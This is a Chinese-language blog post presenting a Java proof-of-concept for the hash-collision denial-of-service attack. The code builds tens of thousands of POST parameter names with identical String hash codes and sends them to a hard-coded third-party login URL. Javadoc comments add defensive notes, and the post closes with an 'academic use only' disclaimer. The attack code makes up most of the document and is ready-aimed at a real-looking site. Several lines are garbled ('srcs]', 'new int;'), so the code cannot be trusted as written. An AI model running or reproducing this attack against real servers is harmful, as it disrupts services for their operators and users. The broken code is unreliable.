Hash Collision DoS代码
最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题。原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而使服务器拒绝服务。详细描述可以看上面那篇文章。
我试着写了个攻击的例子代码:
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;

/**
 * Proof-of-concept for the 2011 hash-collision denial-of-service class of bugs, as described in
 * the article this post links to.
 *
 * <p>The two seeds {@code "Aa"} and {@code "BB"} have the same {@code String.hashCode()}, so every
 * string built by concatenating n of them in any order also shares one hash value. Sending many
 * such strings as form-parameter names forces a server that stores parameters in a plain hash map
 * into a single bucket, turning each insert/lookup into a linear scan.
 *
 * <p>Defender notes: JDK 8+ {@code HashMap} converts long bucket chains into balanced trees when the
 * keys are {@code Comparable} (as {@code String} is), which caps the per-bucket cost at O(log n);
 * servlet containers also cap the number of request parameters (e.g. Tomcat's
 * {@code maxParameterCount}) and the request body size. A reverse proxy or WAF limiting body size
 * and parameter count gives the same protection in front of older stacks. A burst of POST requests
 * carrying tens of thousands of parameters with near-identical names is the detection signal.
 *
 * <p>Note that {@link #main} hard-codes a third-party host as the target.
 */
public class HashCollisionDosAttack {
    // The two seed strings; their String.hashCode() values are equal.
    private final String[] srcs = {"Aa", "BB"};

    /**
     * Builds all {@code 2^n} strings made of n seed fragments, one per bit pattern of
     * {@code 0..2^n-1}. Every returned string has the same hash code.
     *
     * @param n number of seed fragments per string
     * @return list of {@code 2^n} colliding strings
     */
    private List<String> getStrings(int n) {
        List<String> strlist = new ArrayList<String>();
        int round = (int) Math.pow(2, n);
        for (int i = 0; i < round; ++i) {
            strlist.add(getString(i, n));
        }
        return strlist;
    }

    /**
     * Maps one bit pattern to a string: bit i of {@code index} selects which seed fragment
     * occupies position i.
     *
     * @param index bit pattern to encode
     * @param n number of fragments (bits) to use
     * @return the concatenated string
     */
    private String getString(int index, int n) {
        String str = "";
        int[] bytes = getBytesOf(index, n);
        for (int i = 0; i < bytes.length; ++i) {
            str += srcs];
        }
        return str;
    }

    /**
     * Decomposes {@code index} into its low n bits; each loop iteration computes
     * {@code 1 & (index >> i)}, i.e. bit i.
     *
     * @param index value to decompose
     * @param n number of bits to extract
     * @return one 0/1 entry per bit
     */
    private int[] getBytesOf(int index, int n) {
        int[] bytes = new int;
        for (int i = 0; i < n; ++i) {
            bytes = 1 & (index >> i);
        }
        return bytes;
    }

    /**
     * Writes a minimal, hand-built HTTP/1.1 form POST over a raw socket. The response is never
     * read, and the socket is closed in {@code finally} despite the Keep-Alive header.
     *
     * @param url target; only host, port and path are used
     * @param params urlencoded request body
     */
    private void post(URL url, String params) {
        Socket socket = null;
        BufferedWriter bw = null;
        BufferedReader br = null;
        try {
            socket = new Socket(url.getHost(), url.getPort());
            bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
            bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");
            bw.write("Host: " + url.getHost() + "\r\n");
            bw.write("Content-Type: application/x-www-form-urlencoded\r\n");
            // Content-Length is taken from the char count of params, not its encoded byte length.
            bw.write("Content-Length: " + params.length() + "\r\n");
            bw.write("Connection: Keep-Alive\r\n");
            bw.write("\r\n");
            bw.write(params);
            bw.flush();
            // br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));
            // String line;
            // while ((line = br.readLine()) != null) {
            // System.out.println(line);
            // }
            // System.out.println(params);
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            // Each resource is closed independently so one failure does not skip the others.
            if (null != socket) {
                try {
                    socket.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (null != bw) {
                try {
                    bw.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (null != br) {
                try {
                    br.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }

    /**
     * Concatenates the parameter sets for every length {@code 1..n} into one body and posts it.
     * The body holds {@code 2^1 + ... + 2^n = 2^(n+1) - 2} parameters (65534 for n = 15).
     *
     * @param urlStr target URL
     * @param n largest number of seed fragments per parameter name
     * @throws MalformedURLException if {@code urlStr} cannot be parsed
     */
    public void attack(String urlStr, int n) throws MalformedURLException {
        String params = "";
        for (int i = 1; i <= n; ++i) {
            params += buildParams(getStrings(i));
        }
        URL url = new URL(urlStr);
        post(url, params);
    }

    /**
     * Turns each string into a {@code name=x&} pair and appends it to the body.
     *
     * @param strings parameter names
     * @return the urlencoded fragment, with a trailing {@code &}
     */
    private String buildParams(List<String> strings) {
        String params = "";
        for (String str : strings) {
            params += str + "=x&";
            // Result is discarded; this only forces the String to compute (and cache) its hash.
            params.hashCode();
        }
        return params;
    }

    /** Entry point: hard-coded third-party target URL and n = 15. */
    public static void main(String[] args) throws MalformedURLException {
        HashCollisionDosAttack attack = new HashCollisionDosAttack();
        attack.attack("http://frigile.com/login/login.htm", 15);
    }
}
仅作学术交流,请勿用于非法目的。